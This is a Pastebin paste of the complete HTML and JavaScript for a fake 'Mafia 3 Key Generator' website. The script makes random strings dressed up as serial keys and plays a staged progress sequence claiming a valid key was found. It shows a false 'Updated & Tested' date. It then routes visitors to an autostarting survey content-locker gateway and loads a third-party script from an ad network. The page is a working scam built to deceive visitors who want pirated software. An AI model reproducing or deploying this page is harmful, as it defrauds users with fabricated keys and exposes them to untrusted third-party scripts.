Advertisement
Watchdog098

Modified Mafia 3 Key Generator Website

Oct 20th, 2016
400
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.71 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  2. <html>
  3. <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  4. <script>autostart_var = false;function autostart(){setTimeout("openGatewayACAPI(11059, '8616e')",1000);}</script><script type="text/javascript" src="http://astrocash.org/js/widgetapi.js"></script>
  5. <title>Mafia 3 Key Generator</title>
  6. <meta name="description" content=''>
  7. <meta name="keywords" content='Mafia 3 key generator, Mafia 3 keygen, Mafia 3 serial key, Mafia 3 activation code, Mafia 3 paid version for free'>
  8. <link rel="shortcut icon" href='' />
  9. <style type="text/css">
  10. body {
  11. font: 80%/1.4 Verdana, Arial, Helvetica, sans-serif;
  12. background:; /*bgcol*/
  13. margin: 0;
  14. padding: 0;
  15. background-position: 50% 50%;
  16. background-attachment: fixed;
  17. color: #000; /*contentforecolor*/
  18. background-image: url(http://i.imgur.com/NkU2K0B.jpg);
  19. background-repeat: no-repeat;
  20. background-size: cover;
  21. }
  22. h1 {
  23. text-shadow: 3px 3px 2px rgba(150, 150, 150, 0.68);
  24. color: #FFFFFF;
  25. }
  26. img {border: 0px;}
  27. .container {
  28. width: 80%;
  29. max-width: 800px;
  30. min-width: 600px;
  31. background: ; /*contentbgcolor*/
  32. margin-right: auto; /*margin*/
  33. margin-left: auto; /*margin*/
  34. box-shadow: 0px 0px 20px 10px rgba(0, 0, 0, 0.6);-moz-box-shadow: 0px 0px 20px 10px rgba(0, 0, 0,0.6);-webkit-box-shadow: 0px 0px 20px 10px rgba(0, 0, 0, 0.6);
  35. border: thin solid ;
  36. opacity:0.9; filter:alpha(opacity=90); /* For IE8 and earlier */
  37. border-radius: 0px 0px 0px 0px; /*roundededges*/
  38. }
  39. .header {
  40. opacity:1; filter:alpha(opacity=100); /* For IE8 and earlier | Header Opacity */
  41. background: #F5E791; /*header*/
  42. background-size: 100%;
  43. border-radius: 0px 0px 0px 0px;
  44. }
  45. </style>
  46. <script language='JavaScript' type='text/JavaScript'>
  47. /*var tenth = '';
  48. function ninth() {
  49. if (document.all) {
  50. (tenth);
  51. return false;
  52. }
  53. }
  54. function twelfth(e) {
  55. if (document.layers || (document.getElementById && !document.all)) {
  56. if (e.which == 2 || e.which == 3) {
  57. (tenth);
  58. return false;
  59. }
  60. }
  61. }
  62. if (document.layers) {
  63. document.captureEvents(Event.MOUSEDOWN);
  64. document.onmousedown = twelfth;
  65. } else {
  66. document.onmouseup = twelfth;
  67. document.oncontextmenu = ninth;
  68. }
  69. document.oncontextmenu = new Function('return false')
  70. */</script>
  71. <script language='javascript' type='text/javascript'>
  72. var gift1='';
  73. var gift2='';
  74. var gift3='';
  75. var gift_given='';
  76. function data(){
  77. var today = new Date();
  78. var dd = today.getDate();
  79. var mm = today.getMonth()+1;
  80. if(dd < 3 && mm > 1){
  81. dd = 30+dd-2;
  82. mm = mm-1;
  83. }else if(dd < 3 && mm == 1){
  84. dd = 30+dd-2;
  85. mm = 12;
  86. }
  87. else{
  88. dd=dd-2;
  89. mm = mm
  90. }
  91. var yyyy = today.getFullYear();
  92. var dateUpdate = mm+'/'+dd+'/'+yyyy
  93. document.getElementById('lastUpdate').innerHTML='Updated & Tested ' + dateUpdate;
  94. document.getElementById('ftext').innerHTML=today;
  95. }
  96. function randomString() {
  97. var chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZ';
  98. var chars2 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZ';
  99. var string_length = 16;
  100. var string_length2 = 4;
  101. var randomstring = '';
  102. var randomstring2 = '';
  103. for (var i=0; i<string_length; i++) {
  104. var rnum = Math.floor(Math.random() * chars.length);
  105. randomstring += chars.substring(rnum,rnum+1);
  106. }
  107. var msgCode = document.getElementById('msg');
  108. var myCode = randomstring;
  109. var codeShow = myCode.toString().replace(/\B(?=(?:.{4})+(?!.))/g,'-');
  110. for (var i=0; i<string_length2; i++) {
  111. var rnum2 = Math.floor(Math.random() * chars2.length);
  112. randomstring2 += chars2.substring(rnum2,rnum2+1);
  113. }
  114. msgCode.innerHTML = codeShow + '-'+randomstring2;
  115. }
  116. var prg_width = 400;
  117. function progress1() {
  118. document.getElementById('theGenButton').style.display='none';
  119. document.getElementById('disImageButton').style.display='block';
  120. var node = document.getElementById('progress');
  121. var tnode = document.getElementById('progressText');
  122. var w = node.style.width.match(/\d+/);
  123. var txt = document.getElementById('myTxt');
  124. if (w == prg_width) {
  125. w = 0;
  126. }
  127. var val = parseInt(w) + 5;
  128. node.style.width = val + 'px';
  129. tnode.innerHTML = (val/prg_width * 100).toFixed(0) + '%';
  130. if(val == 10){
  131. txt.innerHTML = 'Connecting to the server...';
  132. }
  133. if(val == 80){
  134. txt.innerHTML = 'Connected to server...';
  135. }
  136. if(val == 260){
  137. txt.innerHTML = 'Searching for a "Mafia 3" Key';
  138. }
  139. if(val == 305){
  140. txt.innerHTML = 'A valid "Mafia 3" Key was found';
  141. }
  142. if(val == 380){
  143. txt.innerHTML = 'Downloading "Mafia 3" Key';
  144. }
  145. if(val == 400){
  146. txt.innerHTML = 'Downloading "Mafia 3" Key';
  147. var sl1 = document.getElementById('ok1');
  148. var sl2 = document.getElementById('ok2');
  149. sl1.innerHTML = 'CONGRATULATIONS';
  150. sl2.innerHTML = 'Your "Mafia 3" Serial Key was generated';
  151. document.getElementById('i').style.display='none';
  152. document.getElementById('myTxt').style.display='none';
  153. document.getElementById('myGenButton').style.display='none';
  154. document.getElementById('y').style.display='none';
  155. document.getElementById('lastUpdate').style.display='none';
  156. document.getElementById('h').style.display='block';
  157. document.getElementById('about').style.display='none'
  158. document.getElementById('video').style.display='none'
  159. document.getElementById('codeshow').style.display='block'
  160. }
  161. }
  162. function mark1(el) {
  163. el.style.border = '5px solid #00CC00';
  164. document.getElementById('card2').style.border='0';
  165. document.getElementById('card3').style.border='0';
  166. document.getElementById('check1').style.display='block';
  167. document.getElementById('check2').style.display='none';
  168. document.getElementById('check3').style.display='none';
  169. document.getElementById('pText').style.display='none';
  170. document.getElementById('i').style.display='block';
  171. document.getElementById('myTxt').style.display='block';
  172. document.getElementById('myGenButton').style.display='block';
  173. gift_given = gift1;
  174. }
  175. function mark2(el) {
  176. el.style.border = '5px solid #00CC00';
  177. document.getElementById('card1').style.border='0';
  178. document.getElementById('card3').style.border='0';
  179. document.getElementById('check2').style.display='block';
  180. document.getElementById('check1').style.display='none';
  181. document.getElementById('check3').style.display='none';
  182. document.getElementById('pText').style.display='none';
  183. document.getElementById('i').style.display='block';
  184. document.getElementById('myTxt').style.display='block';
  185. document.getElementById('myGenButton').style.display='block';
  186. gift_given = gift2;
  187. }
  188. function mark3(el) {
  189. el.style.border = '5px solid #00CC00';
  190. document.getElementById('card1').style.border='0';
  191. document.getElementById('card2').style.border='0';
  192. document.getElementById('check3').style.display='block';
  193. document.getElementById('check1').style.display='none';
  194. document.getElementById('check2').style.display='none';
  195. document.getElementById('pText').style.display='none';
  196. document.getElementById('i').style.display='block';
  197. document.getElementById('myTxt').style.display='block';
  198. document.getElementById('myGenButton').style.display='block';
  199. gift_given = gift3;
  200. }
  201. function OnMouseIn() {
  202. document.getElementById('db').src='http://i.imgur.com/LlC18JF.png';
  203. }
  204. function OnMouseOut() {
  205. document.getElementById('db').src='http://i.imgur.com/pEIRdgp.png';
  206. }
  207. </script>
  208. <script type="text/javascript" src="https://gripmedia.co/script_include.php?id=12"></script>
  209. </head>
  210. <body onload='data();'>
  211. <div class='container' style='margin-top: 5%; margin-bottom: 3%;' align='center'>
  212. <div class='header'>
  213. </div>
  214. <br/><h1>Mafia 3 Key Generator</h1>
  215. <div width='0px' align='center'>
  216. <img width='0px' src='http://i.imgur.com/5RWSCIv.png'/>
  217. </div>
  218. <i><h4 id='lastUpdate' style='color: #00FF00; display: block'></h4></i>
  219. <table align='center' id='y'>
  220. <tr>
  221. <td> <img id='card1' onclick='mark1(this);' style='cursor: pointer; display: block;' alt='' src='http://i.imgur.com/aVN6ozO.jpg'/> </td>
  222. <td> <img id='card2' onClick='mark2(this);' style='cursor: pointer; display: block;' alt='' src='http://i.imgur.com/6obtvCg.jpg'/> </td>
  223. <td> <img id='card3' onClick='mark3(this);' style='cursor: pointer; display: block;' alt='' src='http://i.imgur.com/xIesDWO.jpg'/> </td>
  224. </tr>
  225. <tr align='center'>
  226. <td> <img style='display:none;' id='check1' width='50px' height='50px' alt='' src='http://i.imgur.com/YcCduHW.png'/> </td>
  227. <td> <img style='display:none;' id='check2' width='50px' height='50px' alt='' src='http://i.imgur.com/YcCduHW.png'/> </td>
  228. <td> <img style='display:none;' id='check3' width='50px' height='50px' alt='' src='http://i.imgur.com/YcCduHW.png'/> </td>
  229. </tr>
  230. </table>
  231. <h3 style='color:#FFFFFF;' id='pText'>Click the image above to get your FREE serial key </h3>
  232. <div align='left' id='i' style='padding:20px; width: 400px; display:none;'>
  233. <div style='border: 1px solid ; height:20px;'>
  234. <div id='progress' style='color: #FFFFFF; height:20px; width:0px; background-color:; background-image:url("http://i.imgur.com/BsjjPMW.png");'>
  235. <strong><div align='center' style='font-size: medium;' id='progressText'></div></strong>
  236. </div>
  237. </div>
  238. <i><div style='color: #FFFFFF; padding-bottom:5px; text-align: center; display: none;' id='myTxt'>Idle...</div></i>
  239. <div id='myGenButton' style='display: none;' align='center'>
  240. <br/><a class='bw' id='theGenButton' style='cursor: pointer;' onClick='var progress_run_id = setInterval(progress1, 300);randomString();'><img id='db' onmouseover='OnMouseIn();' onmouseout='OnMouseOut();' src='http://i.imgur.com/pEIRdgp.png' /></a>
  241. <img style='display:none; cursor:not-allowed;' id='disImageButton' src='http://i.imgur.com/EjhmZdm.png' />
  242. </div>
  243. </div>
  244. <div align='center' id='h' style='padding:20px; display:none; font-size:large'><strong><span id='ok1' style='color: #FFFFFF'></span><br/> <span id='ok2' style='color: #FFFFFF;'></span></strong> <br/>
  245. <p style='font-size:small; color: #FFFFFF;'><strong>To prevent bots from downloading our codes, we need to verify you are human. Please click the partial code bellow and follow the instructions to unlock full code.
  246. </strong>
  247. </p>
  248. <div id='codeshow' style='display: none; background-color:#BFBEC2; width:400px; padding-top:5px; padding-bottom:5px;'>
  249. <a onclick="openGatewayACAPI(11059, '8616e');" style='color:#00FF00;' href='#' style='arial;' id='msg'></a>
  250. </div>
  251. </div>
  252. <div width='600px' align='center'>
  253. <img width='600px' src='http://i.imgur.com/K4BNlX6.png'/>
  254. </div>
  255. <br/>
  256. <div id='video' style='display: none'>
  257. <h2 style='color: ;'></h2>
  258. <iframe width='560' height='315' src='' frameborder='0' allowfullscreen></iframe>
  259. </div>
  260. <br/>
  261. <div id='about'>
  262. <h2 style='color: ;'></h2>
  263. <p style='color:; text-align: justify; padding-left: 100px; padding-right: 100px;'>
  264.  
  265. </p>
  266. </div>
  267. <br/>
  268. <img src='http://i.imgur.com/EpT0vkY.png' />
  269. <Br/><Br/>
  270. <div style='background-color: ; text-align: center; padding: 10px; color: #FFFFFF;'><strong>Server Status: </strong><img style='vertical-align: middle;' src='http://new.seal-diamond.com/gambar/online.gif'/> <span id='ftext'> </span></div>
  271. </div>
  272. </body>
  273. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement